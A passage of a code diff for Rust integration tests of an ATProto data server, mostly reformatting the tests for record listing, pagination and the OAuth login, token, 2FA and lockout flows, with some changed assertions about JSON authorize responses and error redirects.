"{}/xrpc/com.atproto.repo.listRecords", 691 + base_url().await 692 + )) 693 + .query(&[ 694 + ("repo", did.as_str()), 695 + ("collection", "app.bsky.feed.post"), 696 + ("limit", "2"), 697 + ("cursor", cursor), 698 + ]) 699 + .send() 700 + .await 701 + .expect("Failed to list page 2"); 702 let page2_body: Value = page2.json().await.unwrap(); 703 let page2_records = page2_body["records"].as_array().unwrap(); 704 assert_eq!(page2_records.len(), 2); 705 + let all_uris: Vec<&str> = page1_records 706 + .iter() 707 + .chain(page2_records.iter()) 708 + .map(|r| r["uri"].as_str().unwrap()) 709 + .collect(); 710 let unique_uris: std::collections::HashSet<&str> = all_uris.iter().copied().collect(); 711 + assert_eq!( 712 + all_uris.len(), 713 + unique_uris.len(), 714 + "Cursor pagination should not repeat records" 715 + ); 716 let range_res = client 717 + .get(format!( 718 + "{}/xrpc/com.atproto.repo.listRecords", 719 + base_url().await 720 + )) 721 + .query(&[ 722 + ("repo", did.as_str()), 723 + ("collection", "app.bsky.feed.post"), 724 + ("rkeyStart", "post01"), 725 + ("rkeyEnd", "post03"), 726 + ("reverse", "true"), 727 + ]) 728 + .send() 729 + .await 730 + .expect("Failed to list range"); 731 let range_body: Value = range_res.json().await.unwrap(); 732 + let range_rkeys: Vec<&str> = range_body["records"] 733 + .as_array() 734 + .unwrap() 735 + .iter() 736 + .map(|r| r["uri"].as_str().unwrap().split('/').last().unwrap()) 737 + .collect(); 738 for rkey in &range_rkeys { 739 + assert!( 740 + *rkey >= "post01" && *rkey <= "post03", 741 + "Range should be inclusive" 742 + ); 743 } 744 let limit_res = client 745 + .get(format!( 746 + "{}/xrpc/com.atproto.repo.listRecords", 747 + base_url().await 748 + )) 749 + .query(&[ 750 + ("repo", did.as_str()), 751 + ("collection", "app.bsky.feed.post"), 752 + ("limit", "1000"), 753 + ]) 754 + .send() 755 + .await 756 + .expect("Failed with high limit"); 757 let limit_body: Value = limit_res.json().await.unwrap(); 758 + assert!( 759 + limit_body["records"].as_array().unwrap().len() <= 100, 760 + "Limit should be clamped to max 100" 761 + ); 762 let not_found_res = client 763 + .get(format!( 764 + "{}/xrpc/com.atproto.repo.listRecords", 765 + base_url().await 766 + )) 767 + .query(&[ 768 + ("repo", "did:plc:nonexistent12345"), 769 + ("collection", "app.bsky.feed.post"), 770 + ]) 771 + .send() 772 + .await 773 + .expect("Failed with nonexistent repo"); 774 assert_eq!(not_found_res.status(), StatusCode::NOT_FOUND); 775 }
+1 -1
tests/lifecycle_social.rs
··· 4 use common::*; 5 use helpers::*; 6 use reqwest::StatusCode; 7 - use serde_json::{json, Value}; 8 9 #[tokio::test] 10 async fn test_like_lifecycle() {
··· 4 use common::*; 5 use helpers::*; 6 use reqwest::StatusCode; 7 + use serde_json::{Value, json}; 8 9 #[tokio::test] 10 async fn test_like_lifecycle() {
+2 -4
tests/notifications.rs
··· 1 mod common; 2 use tranquil_pds::comms::{ 3 CommsChannel, CommsStatus, CommsType, NewComms, enqueue_comms, enqueue_welcome, 4 }; 5 - use sqlx::PgPool; 6 7 async fn get_pool() -> PgPool { 8 let conn_str = common::get_db_connection_string().await; ··· 109 "Test".to_string(), 110 "Body".to_string(), 111 ); 112 - enqueue_comms(&pool, item) 113 - .await 114 - .expect("Failed to enqueue"); 115 } 116 let final_count: i64 = sqlx::query_scalar!( 117 "SELECT COUNT(*) FROM comms_queue WHERE status = 'pending' AND user_id = $1",
··· 1 mod common; 2 + use sqlx::PgPool; 3 use tranquil_pds::comms::{ 4 CommsChannel, CommsStatus, CommsType, NewComms, enqueue_comms, enqueue_welcome, 5 }; 6 7 async fn get_pool() -> PgPool { 8 let conn_str = common::get_db_connection_string().await; ··· 109 "Test".to_string(), 110 "Body".to_string(), 111 ); 112 + enqueue_comms(&pool, item).await.expect("Failed to enqueue"); 113 } 114 let final_count: i64 = sqlx::query_scalar!( 115 "SELECT COUNT(*) FROM comms_queue WHERE status = 'pending' AND user_id = $1",
+903 -143
tests/oauth.rs
··· 11 use wiremock::{Mock, MockServer, ResponseTemplate}; 12 13 fn no_redirect_client() -> reqwest::Client { 14 - reqwest::Client::builder().redirect(redirect::Policy::none()).build().unwrap() 15 } 16 17 fn generate_pkce() -> (String, String) { ··· 47 async fn test_oauth_metadata_endpoints() { 48 let url = base_url().await; 49 let client = client(); 50 - let pr_res = client.get(format!("{}/.well-known/oauth-protected-resource", url)).send().await.unwrap(); 51 assert_eq!(pr_res.status(), StatusCode::OK); 52 let pr_body: Value = pr_res.json().await.unwrap(); 53 assert!(pr_body["resource"].is_string()); 54 assert!(pr_body["authorization_servers"].is_array()); 55 - assert!(pr_body["bearer_methods_supported"].as_array().unwrap().contains(&json!("header"))); 56 - let as_res = client.get(format!("{}/.well-known/oauth-authorization-server", url)).send().await.unwrap(); 57 assert_eq!(as_res.status(), StatusCode::OK); 58 let as_body: Value = as_res.json().await.unwrap(); 59 assert!(as_body["issuer"].is_string()); 60 assert!(as_body["authorization_endpoint"].is_string()); 61 assert!(as_body["token_endpoint"].is_string()); 62 assert!(as_body["jwks_uri"].is_string()); 63 - assert!(as_body["response_types_supported"].as_array().unwrap().contains(&json!("code"))); 64 - assert!(as_body["grant_types_supported"].as_array().unwrap().contains(&json!("authorization_code"))); 65 - assert!(as_body["code_challenge_methods_supported"].as_array().unwrap().contains(&json!("S256"))); 66 - assert_eq!(as_body["require_pushed_authorization_requests"], json!(true)); 67 - assert!(as_body["dpop_signing_alg_values_supported"].as_array().unwrap().contains(&json!("ES256"))); 68 - let jwks_res = client.get(format!("{}/oauth/jwks", url)).send().await.unwrap(); 69 assert_eq!(jwks_res.status(), StatusCode::OK); 70 let jwks_body: Value = jwks_res.json().await.unwrap(); 71 assert!(jwks_body["keys"].is_array()); ··· 81 let (_, code_challenge) = generate_pkce(); 82 let par_res = client 83 .post(format!("{}/oauth/par", url)) 84 - .form(&[("response_type", "code"), ("client_id", &client_id), ("redirect_uri", redirect_uri), 85 - ("code_challenge", &code_challenge), ("code_challenge_method", "S256"), ("scope", "atproto"), ("state", "test-state")]) 86 - .send().await.unwrap(); 87 assert_eq!(par_res.status(), StatusCode::CREATED, "PAR should succeed"); 88 let par_body: Value = par_res.json().await.unwrap(); 89 assert!(par_body["request_uri"].is_string()); ··· 94 .get(format!("{}/oauth/authorize", url)) 95 .header("Accept", "application/json") 96 .query(&[("request_uri", request_uri)]) 97 - .send().await.unwrap(); 98 assert_eq!(auth_res.status(), StatusCode::OK); 99 let auth_body: Value = auth_res.json().await.unwrap(); 100 assert_eq!(auth_body["client_id"], client_id); ··· 103 let invalid_res = client 104 .get(format!("{}/oauth/authorize", url)) 105 .header("Accept", "application/json") 106 - .query(&[("request_uri", "urn:ietf:params:oauth:request_uri:nonexistent")]) 107 - .send().await.unwrap(); 108 assert_eq!(invalid_res.status(), StatusCode::BAD_REQUEST); 109 - let missing_res = client.get(format!("{}/oauth/authorize", url)).send().await.unwrap(); 110 - assert_eq!(missing_res.status(), StatusCode::BAD_REQUEST); 111 } 112 113 #[tokio::test] ··· 121 let create_res = http_client 122 .post(format!("{}/xrpc/com.atproto.server.createAccount", url)) 123 .json(&json!({ "handle": handle, "email": email, "password": password })) 124 - .send().await.unwrap(); 125 assert_eq!(create_res.status(), StatusCode::OK); 126 let account: Value = create_res.json().await.unwrap(); 127 let user_did = account["did"].as_str().unwrap(); ··· 133 let state = format!("state-{}", ts); 134 let par_res = http_client 135 .post(format!("{}/oauth/par", url)) 136 - .form(&[("response_type", "code"), ("client_id", &client_id), ("redirect_uri", redirect_uri), 137 - ("code_challenge", &code_challenge), ("code_challenge_method", "S256"), ("scope", "atproto"), ("state", &state)]) 138 - .send().await.unwrap(); 139 let par_body: Value = par_res.json().await.unwrap(); 140 let request_uri = par_body["request_uri"].as_str().unwrap(); 141 - let auth_client = no_redirect_client(); 142 - let auth_res = auth_client 143 .post(format!("{}/oauth/authorize", url)) 144 - .form(&[("request_uri", request_uri), ("username", &handle), ("password", password), ("remember_device", "false")]) 145 .send().await.unwrap(); 146 - assert!(auth_res.status().is_redirection(), "Expected redirect, got {}", auth_res.status()); 147 - let location = auth_res.headers().get("location").unwrap().to_str().unwrap(); 148 - assert!(location.starts_with(redirect_uri), "Redirect to wrong URI"); 149 assert!(location.contains("code="), "No code in redirect"); 150 - assert!(location.contains(&format!("state={}", state)), "Wrong state"); 151 - let code = location.split("code=").nth(1).unwrap().split('&').next().unwrap(); 152 let token_res = http_client 153 .post(format!("{}/oauth/token", url)) 154 - .form(&[("grant_type", "authorization_code"), ("code", code), ("redirect_uri", redirect_uri), 155 - ("code_verifier", &code_verifier), ("client_id", &client_id)]) 156 - .send().await.unwrap(); 157 assert_eq!(token_res.status(), StatusCode::OK, "Token exchange failed"); 158 let token_body: Value = token_res.json().await.unwrap(); 159 assert!(token_body["access_token"].is_string()); ··· 165 let refresh_token = token_body["refresh_token"].as_str().unwrap(); 166 let refresh_res = http_client 167 .post(format!("{}/oauth/token", url)) 168 - .form(&[("grant_type", "refresh_token"), ("refresh_token", refresh_token), ("client_id", &client_id)]) 169 - .send().await.unwrap(); 170 assert_eq!(refresh_res.status(), StatusCode::OK); 171 let refresh_body: Value = refresh_res.json().await.unwrap(); 172 assert_ne!(refresh_body["access_token"].as_str().unwrap(), access_token); 173 - assert_ne!(refresh_body["refresh_token"].as_str().unwrap(), refresh_token); 174 let introspect_res = http_client 175 .post(format!("{}/oauth/introspect", url)) 176 .form(&[("token", refresh_body["access_token"].as_str().unwrap())]) 177 - .send().await.unwrap(); 178 assert_eq!(introspect_res.status(), StatusCode::OK); 179 let introspect_body: Value = introspect_res.json().await.unwrap(); 180 assert_eq!(introspect_body["active"], true); 181 let revoke_res = http_client 182 .post(format!("{}/oauth/revoke", url)) 183 .form(&[("token", refresh_body["refresh_token"].as_str().unwrap())]) 184 - .send().await.unwrap(); 185 assert_eq!(revoke_res.status(), StatusCode::OK); 186 let introspect_after = http_client 187 .post(format!("{}/oauth/introspect", url)) 188 .form(&[("token", refresh_body["access_token"].as_str().unwrap())]) 189 - .send().await.unwrap(); 190 let after_body: Value = introspect_after.json().await.unwrap(); 191 - assert_eq!(after_body["active"], false, "Revoked token should be inactive"); 192 } 193 194 #[tokio::test] ··· 198 let ts = Utc::now().timestamp_millis(); 199 let handle = format!("wrong-creds-{}", ts); 200 let email = format!("wrong-creds-{}@example.com", ts); 201 - http_client.post(format!("{}/xrpc/com.atproto.server.createAccount", url)) 202 .json(&json!({ "handle": handle, "email": email, "password": "correct-password" })) 203 - .send().await.unwrap(); 204 let redirect_uri = "https://example.com/callback"; 205 let mock_client = setup_mock_client_metadata(redirect_uri).await; 206 let client_id = mock_client.uri(); 207 let (_, code_challenge) = generate_pkce(); 208 let par_body: Value = http_client 209 .post(format!("{}/oauth/par", url)) 210 - .form(&[("response_type", "code"), ("client_id", &client_id), ("redirect_uri", redirect_uri), 211 - ("code_challenge", &code_challenge), ("code_challenge_method", "S256")]) 212 - .send().await.unwrap().json().await.unwrap(); 213 let request_uri = par_body["request_uri"].as_str().unwrap(); 214 let auth_res = http_client 215 .post(format!("{}/oauth/authorize", url)) 216 .header("Accept", "application/json") 217 - .form(&[("request_uri", request_uri), ("username", &handle), ("password", "wrong-password"), ("remember_device", "false")]) 218 .send().await.unwrap(); 219 assert_eq!(auth_res.status(), StatusCode::FORBIDDEN); 220 let error_body: Value = auth_res.json().await.unwrap(); 221 assert_eq!(error_body["error"], "access_denied"); 222 let unsupported = http_client 223 .post(format!("{}/oauth/token", url)) 224 - .form(&[("grant_type", "client_credentials"), ("client_id", "https://example.com")]) 225 - .send().await.unwrap(); 226 assert_eq!(unsupported.status(), StatusCode::BAD_REQUEST); 227 let body: Value = unsupported.json().await.unwrap(); 228 assert_eq!(body["error"], "unsupported_grant_type"); 229 let invalid_refresh = http_client 230 .post(format!("{}/oauth/token", url)) 231 - .form(&[("grant_type", "refresh_token"), ("refresh_token", "invalid-token"), ("client_id", "https://example.com")]) 232 - .send().await.unwrap(); 233 assert_eq!(invalid_refresh.status(), StatusCode::BAD_REQUEST); 234 let body: Value = invalid_refresh.json().await.unwrap(); 235 assert_eq!(body["error"], "invalid_grant"); 236 let invalid_introspect = http_client 237 .post(format!("{}/oauth/introspect", url)) 238 .form(&[("token", "invalid.token.here")]) 239 - .send().await.unwrap(); 240 assert_eq!(invalid_introspect.status(), StatusCode::OK); 241 let body: Value = invalid_introspect.json().await.unwrap(); 242 assert_eq!(body["active"], false); ··· 244 .get(format!("{}/oauth/authorize", url)) 245 .header("Accept", "application/json") 246 .query(&[("request_uri", "urn:ietf:params:oauth:request_uri:expired")]) 247 - .send().await.unwrap(); 248 assert_eq!(expired_res.status(), StatusCode::BAD_REQUEST); 249 } 250 ··· 259 let create_res = http_client 260 .post(format!("{}/xrpc/com.atproto.server.createAccount", url)) 261 .json(&json!({ "handle": handle, "email": email, "password": password })) 262 - .send().await.unwrap(); 263 assert_eq!(create_res.status(), StatusCode::OK); 264 let account: Value = create_res.json().await.unwrap(); 265 let user_did = account["did"].as_str().unwrap(); 266 verify_new_account(&http_client, user_did).await; 267 let db_url = get_db_connection_string().await; 268 - let pool = sqlx::postgres::PgPoolOptions::new().max_connections(1).connect(&db_url).await.unwrap(); 269 sqlx::query("UPDATE users SET two_factor_enabled = true WHERE did = $1") 270 - .bind(user_did).execute(&pool).await.unwrap(); 271 let redirect_uri = "https://example.com/2fa-callback"; 272 let mock_client = setup_mock_client_metadata(redirect_uri).await; 273 let client_id = mock_client.uri(); 274 let (code_verifier, code_challenge) = generate_pkce(); 275 let par_body: Value = http_client 276 .post(format!("{}/oauth/par", url)) 277 - .form(&[("response_type", "code"), ("client_id", &client_id), ("redirect_uri", redirect_uri), 278 - ("code_challenge", &code_challenge), ("code_challenge_method", "S256")]) 279 - .send().await.unwrap().json().await.unwrap(); 280 let request_uri = par_body["request_uri"].as_str().unwrap(); 281 - let auth_client = no_redirect_client(); 282 - let auth_res = auth_client 283 .post(format!("{}/oauth/authorize", url)) 284 - .form(&[("request_uri", request_uri), ("username", &handle), ("password", password), ("remember_device", "false")]) 285 .send().await.unwrap(); 286 - assert!(auth_res.status().is_redirection(), "Should redirect to 2FA page"); 287 - let location = auth_res.headers().get("location").unwrap().to_str().unwrap(); 288 - assert!(location.contains("/oauth/authorize/2fa"), "Should redirect to 2FA page, got: {}", location); 289 let twofa_invalid = http_client 290 .post(format!("{}/oauth/authorize/2fa", url)) 291 - .form(&[("request_uri", request_uri), ("code", "000000")]) 292 - .send().await.unwrap(); 293 - assert_eq!(twofa_invalid.status(), StatusCode::OK); 294 - let body = twofa_invalid.text().await.unwrap(); 295 - assert!(body.contains("Invalid verification code") || body.contains("invalid")); 296 - let twofa_code: String = sqlx::query_scalar("SELECT code FROM oauth_2fa_challenge WHERE request_uri = $1") 297 - .bind(request_uri).fetch_one(&pool).await.unwrap(); 298 - let twofa_res = auth_client 299 .post(format!("{}/oauth/authorize/2fa", url)) 300 - .form(&[("request_uri", request_uri), ("code", &twofa_code)]) 301 - .send().await.unwrap(); 302 - assert!(twofa_res.status().is_redirection(), "Valid 2FA code should redirect"); 303 - let final_location = twofa_res.headers().get("location").unwrap().to_str().unwrap(); 304 assert!(final_location.starts_with(redirect_uri) && final_location.contains("code=")); 305 - let auth_code = final_location.split("code=").nth(1).unwrap().split('&').next().unwrap(); 306 let token_res = http_client 307 .post(format!("{}/oauth/token", url)) 308 - .form(&[("grant_type", "authorization_code"), ("code", auth_code), ("redirect_uri", redirect_uri), 309 - ("code_verifier", &code_verifier), ("client_id", &client_id)]) 310 - .send().await.unwrap(); 311 assert_eq!(token_res.status(), StatusCode::OK); 312 let token_body: Value = token_res.json().await.unwrap(); 313 assert_eq!(token_body["sub"], user_did); ··· 324 let create_res = http_client 325 .post(format!("{}/xrpc/com.atproto.server.createAccount", url)) 326 .json(&json!({ "handle": handle, "email": email, "password": password })) 327 - .send().await.unwrap(); 328 let account: Value = create_res.json().await.unwrap(); 329 let user_did = account["did"].as_str().unwrap(); 330 verify_new_account(&http_client, user_did).await; 331 let db_url = get_db_connection_string().await; 332 - let pool = sqlx::postgres::PgPoolOptions::new().max_connections(1).connect(&db_url).await.unwrap(); 333 sqlx::query("UPDATE users SET two_factor_enabled = true WHERE did = $1") 334 - .bind(user_did).execute(&pool).await.unwrap(); 335 let redirect_uri = "https://example.com/2fa-lockout-callback"; 336 let mock_client = setup_mock_client_metadata(redirect_uri).await; 337 let client_id = mock_client.uri(); 338 let (_, code_challenge) = generate_pkce(); 339 let par_body: Value = http_client 340 .post(format!("{}/oauth/par", url)) 341 - .form(&[("response_type", "code"), ("client_id", &client_id), ("redirect_uri", redirect_uri), 342 - ("code_challenge", &code_challenge), ("code_challenge_method", "S256")]) 343 - .send().await.unwrap().json().await.unwrap(); 344 let request_uri = par_body["request_uri"].as_str().unwrap(); 345 - let auth_client = no_redirect_client(); 346 - let auth_res = auth_client 347 .post(format!("{}/oauth/authorize", url)) 348 - .form(&[("request_uri", request_uri), ("username", &handle), ("password", password), ("remember_device", "false")]) 349 .send().await.unwrap(); 350 - assert!(auth_res.status().is_redirection()); 351 for i in 0..5 { 352 let res = http_client 353 .post(format!("{}/oauth/authorize/2fa", url)) 354 - .form(&[("request_uri", request_uri), ("code", "999999")]) 355 - .send().await.unwrap(); 356 if i < 4 { 357 - assert_eq!(res.status(), StatusCode::OK); 358 } 359 } 360 let lockout_res = http_client 361 .post(format!("{}/oauth/authorize/2fa", url)) 362 - .form(&[("request_uri", request_uri), ("code", "999999")]) 363 - .send().await.unwrap(); 364 - let body = lockout_res.text().await.unwrap(); 365 - assert!(body.contains("Too many failed attempts") || body.contains("No 2FA challenge found")); 366 } 367 368 #[tokio::test] ··· 376 let create_res = http_client 377 .post(format!("{}/xrpc/com.atproto.server.createAccount", url)) 378 .json(&json!({ "handle": handle, "email": email, "password": password })) 379 - .send().await.unwrap(); 380 let account: Value = create_res.json().await.unwrap(); 381 let user_did = account["did"].as_str().unwrap().to_string(); 382 verify_new_account(&http_client, &user_did).await; ··· 386 let (code_verifier, code_challenge) = generate_pkce(); 387 let par_body: Value = http_client 388 .post(format!("{}/oauth/par", url)) 389 - .form(&[("response_type", "code"), ("client_id", &client_id), ("redirect_uri", redirect_uri), 390 - ("code_challenge", &code_challenge), ("code_challenge_method", "S256")]) 391 - .send().await.unwrap().json().await.unwrap(); 392 let request_uri = par_body["request_uri"].as_str().unwrap(); 393 - let auth_client = no_redirect_client(); 394 - let auth_res = auth_client 395 .post(format!("{}/oauth/authorize", url)) 396 - .form(&[("request_uri", request_uri), ("username", &handle), ("password", password), ("remember_device", "true")]) 397 .send().await.unwrap(); 398 - assert!(auth_res.status().is_redirection()); 399 - let device_cookie = auth_res.headers().get("set-cookie") 400 .and_then(|v| v.to_str().ok()) 401 .map(|s| s.split(';').next().unwrap_or("").to_string()) 402 .expect("Should have device cookie"); 403 - let location = auth_res.headers().get("location").unwrap().to_str().unwrap(); 404 assert!(location.contains("code=")); 405 - let code = location.split("code=").nth(1).unwrap().split('&').next().unwrap(); 406 let _ = http_client 407 .post(format!("{}/oauth/token", url)) 408 - .form(&[("grant_type", "authorization_code"), ("code", code), ("redirect_uri", redirect_uri), 409 - ("code_verifier", &code_verifier), ("client_id", &client_id)]) 410 - .send().await.unwrap().json::<Value>().await.unwrap(); 411 let db_url = get_db_connection_string().await; 412 - let pool = sqlx::postgres::PgPoolOptions::new().max_connections(1).connect(&db_url).await.unwrap(); 413 sqlx::query("UPDATE users SET two_factor_enabled = true WHERE did = $1") 414 - .bind(&user_did).execute(&pool).await.unwrap(); 415 let (code_verifier2, code_challenge2) = generate_pkce(); 416 let par_body2: Value = http_client 417 .post(format!("{}/oauth/par", url)) 418 - .form(&[("response_type", "code"), ("client_id", &client_id), ("redirect_uri", redirect_uri), 419 - ("code_challenge", &code_challenge2), ("code_challenge_method", "S256")]) 420 - .send().await.unwrap().json().await.unwrap(); 421 let request_uri2 = par_body2["request_uri"].as_str().unwrap(); 422 - let select_res = auth_client 423 .post(format!("{}/oauth/authorize/select", url)) 424 .header("cookie", &device_cookie) 425 - .form(&[("request_uri", request_uri2), ("did", &user_did)]) 426 - .send().await.unwrap(); 427 - assert!(select_res.status().is_redirection()); 428 - let select_location = select_res.headers().get("location").unwrap().to_str().unwrap(); 429 - assert!(select_location.contains("/oauth/authorize/2fa"), "Should redirect to 2FA page"); 430 - let twofa_code: String = sqlx::query_scalar("SELECT code FROM oauth_2fa_challenge WHERE request_uri = $1") 431 - .bind(request_uri2).fetch_one(&pool).await.unwrap(); 432 - let twofa_res = auth_client 433 .post(format!("{}/oauth/authorize/2fa", url)) 434 .header("cookie", &device_cookie) 435 - .form(&[("request_uri", request_uri2), ("code", &twofa_code)]) 436 - .send().await.unwrap(); 437 - assert!(twofa_res.status().is_redirection()); 438 - let final_location = twofa_res.headers().get("location").unwrap().to_str().unwrap(); 439 assert!(final_location.starts_with(redirect_uri) && final_location.contains("code=")); 440 - let final_code = final_location.split("code=").nth(1).unwrap().split('&').next().unwrap(); 441 let token_res = http_client 442 .post(format!("{}/oauth/token", url)) 443 - .form(&[("grant_type", "authorization_code"), ("code", final_code), ("redirect_uri", redirect_uri), 444 - ("code_verifier", &code_verifier2), ("client_id", &client_id)]) 445 - .send().await.unwrap(); 446 assert_eq!(token_res.status(), StatusCode::OK); 447 let final_token: Value = token_res.json().await.unwrap(); 448 assert_eq!(final_token["sub"], user_did); ··· 459 let create_res = http_client 460 .post(format!("{}/xrpc/com.atproto.server.createAccount", url)) 461 .json(&json!({ "handle": handle, "email": email, "password": password })) 462 - .send().await.unwrap(); 463 let account: Value = create_res.json().await.unwrap(); 464 verify_new_account(&http_client, account["did"].as_str().unwrap()).await; 465 let redirect_uri = "https://example.com/state-special-callback"; ··· 469 let special_state = "state=with&special=chars&plus+more"; 470 let par_body: Value = http_client 471 .post(format!("{}/oauth/par", url)) 472 - .form(&[("response_type", "code"), ("client_id", &client_id), ("redirect_uri", redirect_uri), 473 - ("code_challenge", &code_challenge), ("code_challenge_method", "S256"), ("state", special_state)]) 474 - .send().await.unwrap().json().await.unwrap(); 475 let request_uri = par_body["request_uri"].as_str().unwrap(); 476 - let auth_client = no_redirect_client(); 477 - let auth_res = auth_client 478 .post(format!("{}/oauth/authorize", url)) 479 - .form(&[("request_uri", request_uri), ("username", &handle), ("password", password), ("remember_device", "false")]) 480 .send().await.unwrap(); 481 - assert!(auth_res.status().is_redirection()); 482 - let location = auth_res.headers().get("location").unwrap().to_str().unwrap(); 483 assert!(location.contains("state=")); 484 let encoded_state = urlencoding::encode(special_state); 485 - assert!(location.contains(&format!("state={}", encoded_state)), "State should be URL-encoded. Got: {}", location); 486 }
··· 11 use wiremock::{Mock, MockServer, ResponseTemplate}; 12 13 fn no_redirect_client() -> reqwest::Client { 14 + reqwest::Client::builder() 15 + .redirect(redirect::Policy::none()) 16 + .build() 17 + .unwrap() 18 } 19 20 fn generate_pkce() -> (String, String) { ··· 50 async fn test_oauth_metadata_endpoints() { 51 let url = base_url().await; 52 let client = client(); 53 + let pr_res = client 54 + .get(format!("{}/.well-known/oauth-protected-resource", url)) 55 + .send() 56 + .await 57 + .unwrap(); 58 assert_eq!(pr_res.status(), StatusCode::OK); 59 let pr_body: Value = pr_res.json().await.unwrap(); 60 assert!(pr_body["resource"].is_string()); 61 assert!(pr_body["authorization_servers"].is_array()); 62 + assert!( 63 + pr_body["bearer_methods_supported"] 64 + .as_array() 65 + .unwrap() 66 + .contains(&json!("header")) 67 + ); 68 + let as_res = client 69 + .get(format!("{}/.well-known/oauth-authorization-server", url)) 70 + .send() 71 + .await 72 + .unwrap(); 73 assert_eq!(as_res.status(), StatusCode::OK); 74 let as_body: Value = as_res.json().await.unwrap(); 75 assert!(as_body["issuer"].is_string()); 76 assert!(as_body["authorization_endpoint"].is_string()); 77 assert!(as_body["token_endpoint"].is_string()); 78 assert!(as_body["jwks_uri"].is_string()); 79 + assert!( 80 + as_body["response_types_supported"] 81 + .as_array() 82 + .unwrap() 83 + .contains(&json!("code")) 84 + ); 85 + assert!( 86 + as_body["grant_types_supported"] 87 + .as_array() 88 + .unwrap() 89 + .contains(&json!("authorization_code")) 90 + ); 91 + assert!( 92 + as_body["code_challenge_methods_supported"] 93 + .as_array() 94 + .unwrap() 95 + .contains(&json!("S256")) 96 + ); 97 + assert_eq!( 98 + as_body["require_pushed_authorization_requests"], 99 + json!(true) 100 + ); 101 + assert!( 102 + as_body["dpop_signing_alg_values_supported"] 103 + .as_array() 104 + .unwrap() 105 + .contains(&json!("ES256")) 106 + ); 107 + let jwks_res = client 108 + .get(format!("{}/oauth/jwks", url)) 109 + .send() 110 + .await 111 + .unwrap(); 112 assert_eq!(jwks_res.status(), StatusCode::OK); 113 let jwks_body: Value = jwks_res.json().await.unwrap(); 114 assert!(jwks_body["keys"].is_array()); ··· 124 let (_, code_challenge) = generate_pkce(); 125 let par_res = client 126 .post(format!("{}/oauth/par", url)) 127 + .form(&[ 128 + ("response_type", "code"), 129 + ("client_id", &client_id), 130 + ("redirect_uri", redirect_uri), 131 + ("code_challenge", &code_challenge), 132 + ("code_challenge_method", "S256"), 133 + ("scope", "atproto"), 134 + ("state", "test-state"), 135 + ]) 136 + .send() 137 + .await 138 + .unwrap(); 139 assert_eq!(par_res.status(), StatusCode::CREATED, "PAR should succeed"); 140 let par_body: Value = par_res.json().await.unwrap(); 141 assert!(par_body["request_uri"].is_string()); ··· 146 .get(format!("{}/oauth/authorize", url)) 147 .header("Accept", "application/json") 148 .query(&[("request_uri", request_uri)]) 149 + .send() 150 + .await 151 + .unwrap(); 152 assert_eq!(auth_res.status(), StatusCode::OK); 153 let auth_body: Value = auth_res.json().await.unwrap(); 154 assert_eq!(auth_body["client_id"], client_id); ··· 157 let invalid_res = client 158 .get(format!("{}/oauth/authorize", url)) 159 .header("Accept", "application/json") 160 + .query(&[( 161 + "request_uri", 162 + "urn:ietf:params:oauth:request_uri:nonexistent", 163 + )]) 164 + .send() 165 + .await 166 + .unwrap(); 167 assert_eq!(invalid_res.status(), StatusCode::BAD_REQUEST); 168 + let missing_client = no_redirect_client(); 169 + let missing_res = missing_client 170 + .get(format!("{}/oauth/authorize", url)) 171 + .send() 172 + .await 173 + .unwrap(); 174 + assert!( 175 + missing_res.status().is_redirection(), 176 + "Should redirect to error page" 177 + ); 178 + let error_location = missing_res 179 + .headers() 180 + .get("location") 181 + .unwrap() 182 + .to_str() 183 + .unwrap(); 184 + assert!( 185 + error_location.contains("oauth/error"), 186 + "Should redirect to error page" 187 + ); 188 } 189 190 #[tokio::test] ··· 198 let create_res = http_client 199 .post(format!("{}/xrpc/com.atproto.server.createAccount", url)) 200 .json(&json!({ "handle": handle, "email": email, "password": password })) 201 + .send() 202 + .await 203 + .unwrap(); 204 assert_eq!(create_res.status(), StatusCode::OK); 205 let account: Value = create_res.json().await.unwrap(); 206 let user_did = account["did"].as_str().unwrap(); ··· 212 let state = format!("state-{}", ts); 213 let par_res = http_client 214 .post(format!("{}/oauth/par", url)) 215 + .form(&[ 216 + ("response_type", "code"), 217 + ("client_id", &client_id), 218 + ("redirect_uri", redirect_uri), 219 + ("code_challenge", &code_challenge), 220 + ("code_challenge_method", "S256"), 221 + ("scope", "atproto"), 222 + ("state", &state), 223 + ]) 224 + .send() 225 + .await 226 + .unwrap(); 227 let par_body: Value = par_res.json().await.unwrap(); 228 let request_uri = par_body["request_uri"].as_str().unwrap(); 229 + let auth_res = http_client 230 .post(format!("{}/oauth/authorize", url)) 231 + .header("Content-Type", "application/json") 232 + .header("Accept", "application/json") 233 + .json(&json!({"request_uri": request_uri, "username": &handle, "password": password, "remember_device": false})) 234 .send().await.unwrap(); 235 + assert_eq!( 236 + auth_res.status(), 237 + StatusCode::OK, 238 + "Expected OK with JSON response" 239 + ); 240 + let auth_body: Value = auth_res.json().await.unwrap(); 241 + let mut location = auth_body["redirect_uri"] 242 + .as_str() 243 + .expect("Expected redirect_uri in response") 244 + .to_string(); 245 + if location.contains("/oauth/consent") { 246 + let consent_res = http_client 247 + .post(format!("{}/oauth/authorize/consent", url)) 248 + .header("Content-Type", "application/json") 249 + .json(&json!({"request_uri": request_uri, "approved_scopes": ["atproto"], "remember": false})) 250 + .send().await.unwrap(); 251 + let consent_status = consent_res.status(); 252 + let consent_body: Value = consent_res.json().await.unwrap(); 253 + assert_eq!( 254 + consent_status, 255 + StatusCode::OK, 256 + "Consent should succeed. Got: {:?}", 257 + consent_body 258 + ); 259 + location = consent_body["redirect_uri"] 260 + .as_str() 261 + .expect("Expected redirect_uri from consent") 262 + .to_string(); 263 + } 264 + assert!( 265 + location.starts_with(redirect_uri), 266 + "Redirect to wrong URI: {}", 267 + location 268 + ); 269 assert!(location.contains("code="), "No code in redirect"); 270 + assert!( 271 + location.contains(&format!("state={}", state)), 272 + "Wrong state" 273 + ); 274 + let code = location 275 + .split("code=") 276 + .nth(1) 277 + .unwrap() 278 + .split('&') 279 + .next() 280 + .unwrap(); 281 let token_res = http_client 282 .post(format!("{}/oauth/token", url)) 283 + .form(&[ 284 + ("grant_type", "authorization_code"), 285 + ("code", code), 286 + ("redirect_uri", redirect_uri), 287 + ("code_verifier", &code_verifier), 288 + ("client_id", &client_id), 289 + ]) 290 + .send() 291 + .await 292 + .unwrap(); 293 assert_eq!(token_res.status(), StatusCode::OK, "Token exchange failed"); 294 let token_body: Value = token_res.json().await.unwrap(); 295 assert!(token_body["access_token"].is_string()); ··· 301 let refresh_token = token_body["refresh_token"].as_str().unwrap(); 302 let refresh_res = http_client 303 .post(format!("{}/oauth/token", url)) 304 + .form(&[ 305 + ("grant_type", "refresh_token"), 306 + ("refresh_token", refresh_token), 307 + 